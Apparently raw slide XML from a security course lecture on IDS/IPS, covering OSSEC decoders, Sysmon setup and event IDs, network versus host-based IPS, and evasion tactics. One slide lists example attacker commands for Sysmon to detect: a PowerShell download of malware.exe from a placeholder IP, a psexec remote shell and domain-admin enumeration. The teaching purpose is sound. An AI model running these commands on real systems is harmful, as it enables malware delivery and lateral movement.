              <a:t>after_prematch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>"&gt;^ \S+ for (\S+) from (\S+) port &lt;/regex&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;order&gt;user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>srcip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/order&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>fts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;name, user, location&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>fts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;/decoder&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1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81059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19ADB-BC4A-9648-94F8-8CD15C1D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OSSEC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A9BD5-2C60-EA4D-BBC7-80670C2EF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this week’s exercises (”Week4-IDS.pdf”) and do the OSSEC exercises</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You will</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install prerequisites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download OSSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install OSSEC &amp; Initial </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install OSSEC Web UI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test OSSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure OSSEC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Take 30 minutes for this exercise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216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Sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>tem </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>itor - Microsoft developed tool (coming from Mark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Russinovich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysinternals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Freeware - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exactly a host-based IPS solution, but it provides a ton of telemetry data on hosts which can be used to look for signs of compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Runs as a system service and device driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Provides detailed information on process creations, network connections, changes to file time creations, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send these logs into Windows Event Collection or a SIEM = go threat hunting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223427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AC866-768F-474A-AE99-2BE55B0B5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7620000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://twitter.com/baphometadata/status/960003927818276864</a:t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79BFFE-C738-5244-9E3A-108D3D4CC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80" y="571500"/>
            <a:ext cx="6055520" cy="6133656"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4262854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212B-6F45-E94D-8C6B-72EEDAFF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E44BED-83B3-DC46-8373-A9C6B7787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6" y="417513"/>
            <a:ext cx="8893578" cy="5740400"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2026275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0E328-793B-794E-91C9-3618EAC83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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -  Command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1D011-012B-E448-B62B-CAC23BE66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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = Install the service and driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-c &lt;filename&gt; = Use &lt;filename&gt; as the configuration file/update the configuration (in XML format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-c = List current configuration (notice no &lt;filename&gt;)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-n = Log network connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-s = Print configuration schema</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-u = Uninstall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = Accept the license agreement)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ex: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>accepteula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> c:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>config.xml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24409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EB1B6-12E9-024E-BDBB-3A63D1A5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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -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A942-E587-6947-B647-B01CAA3B3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stored in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Applications and Services Logs/Microsoft/Windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/Operational</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A few example Events created:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 1: Process creation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 2: A process changed a file creation time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 3: Network connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 5: Process terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 6: Driver loaded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 7: Image loaded (DLL Loaded)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Event ID 12: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>RegistryEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Object create and delete)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085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C6AC-EE99-4C43-84C8-E8757F531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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Sample </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Config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EBC995-E73B-0447-A097-E4F6C6303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4" y="1189037"/>
            <a:ext cx="7286624" cy="5595339"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2225810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0E3E6-AED6-3541-96F0-4663FFE0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Sysmon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3D138-760D-A34F-83E4-7CE7F0E63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That configuration would catch things like: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 -command “&amp; { (New-Object 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Net.WebClient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DownloadFile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(‘http://111.777.888.999/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malware.exe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endParaRPr lang="en-US" sz="2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psexec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 \\Remote-Host -u AD\user -p password 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cmd.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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net.exe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 groups “domain administrators" /domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1444617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2270-4845-4E48-B93B-42E29DF50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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Swift on Security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80D71-F096-AE47-9648-01876DCFB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https://github.com/SwiftOnSecurity/sysmon-config</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>A prebuilt configuration with a lot of key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> features.  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Tune as needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Thanks Taylor Swift!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="197963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37AC-D161-6740-BC4B-27B5335CC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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – Swift on Security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7EDECE-458E-E846-8E4F-6D53E1D5B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717675"/>
            <a:ext cx="8858222" cy="4011612"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3546418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FB1EF-DB78-3940-B107-3B5C2703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Sysmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – What to log?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D1C55C-BF11-3145-ADF3-9C0AA9A7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38" y="1231902"/>
            <a:ext cx="7967524" cy="49498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AC878D-CE66-B143-962D-0BC819362FCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="283438" y="6181726"/>
            <a:ext cx="818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https://blogs.technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashed/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29927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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysmon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https://blogs.technet.microsoft.com/motiba/2016/10/18/sysinternals-sysmon-unleashed/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https://blogs.technet.microsoft.com/motiba/2017/12/07/sysinternals-sysmon-suspicious-activity-guide/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https://medium.com/@haggis_m/splunking-the-endpoint-threat-hunting-with-sysmon-9dd956e3e1bd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Sysmon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We might come back to Sysmon during Incident Response…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1143118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61AA-1D99-8449-B0EF-C24AEF51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NGAV?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04873-0305-4F4F-B050-4AC229BD5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NGAV = Next Gen Anti Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>We’ll touch on that soon when we get to incident response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For now NGAV = AV + IPS + magic voodoo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3792528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we get started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Today we’ll use the following VMs for exercises:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4600" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4600" dirty="0"/>
              <a:t>Ubuntu VM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2761317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Network-based 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Open source examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Zeek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" strike="sngStrike" dirty="0"/>
              <a:t>Bro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Snort </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>Suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Commercial examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Palo Alto (as part of their next-gen firewall)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Cisco (Sourcefire)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Trend Micro (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>TippingPoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>McAfee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EFCF7-8315-5046-A1BF-8937FC80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0FB992-8514-A446-BB0B-030DD89F9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99" y="274638"/>
            <a:ext cx="6170587" cy="6474059"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3643868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place on the network?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ips-at-borde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" r="30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5999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place on the network?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="ips-building-level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" r="30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42347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6EFE-A493-054D-8215-0E06CA91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Host-Based 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172F2-D9D4-1E47-950B-506C77CE3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(In theory) protects you from every host out there (LAN and beyond)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>Helps provide a layer of protection on untrusted networks and in the cloud</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3800" dirty="0"/>
          </a:p>
          <a:p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41090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6EFE-A493-054D-8215-0E06CA91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Host-Based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172F2-D9D4-1E47-950B-506C77CE3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Less R&amp;D and smaller rule sets than in IDS/IPS/NGFW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>Installing “Yet another agent” on an system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>Need to centrally manage updates, configuration, logging</a:t>
            </a:r>
          </a:p>
          <a:p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78080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8494-04B4-EB4C-BDDF-07C6DBA7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Network-based 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412F7-C86A-3848-A58D-283BCC1A5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Cast a wide net – protect many systems behind one IPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>No agent needs to be installed on systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3800" dirty="0"/>
              <a:t>More R&amp;D and rule sets for</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="525432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8494-04B4-EB4C-BDDF-07C6DBA7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Network-based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412F7-C86A-3848-A58D-283BCC1A5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Inline mode: if does down then you either fail open (exposed) or fail closed (the network goes down)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Can get very, very expensive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Sysadmins think “I don’t need to patch, the IPS will do the work for me!” (same could be said of host-based too)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2652201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IDS/IPS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Noise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Need to baseline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Signatures need to be updated often</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Volume of logs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Tuning, tuning, tuning!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2541149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IDS/IPS Evasion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IP Fragmentation/reassembly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Low and slow attack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Very hard to correlate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Coordinated attack via many hosts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Correlation nightmare </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Tweaking default exploits, scripts, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Poor rule writing to blame for this</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0"/>
              <a:t>Encrypt all the things!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1870706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74B9E-AF32-B840-968A-2A8126945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Want More Experience With Linux?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40AA7-73EF-494F-BE77-9347A412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some!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download an Ubuntu ISO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install a web server, MySQL database, PHP on it </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you do this?  Google it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Install DVWA - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.dvwa.co.uk/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn how to use key Linux commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>The only way to learn is by doing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review Linux Primer in ELMS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://overthewire.org/wargames/bandit/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIT Terminus - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://web.mit.edu/mprat/Public/web/Terminus/Web/main.html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39195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Snort – History &amp; Intro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Created by Marty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Roesch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> in 1998</a:t>
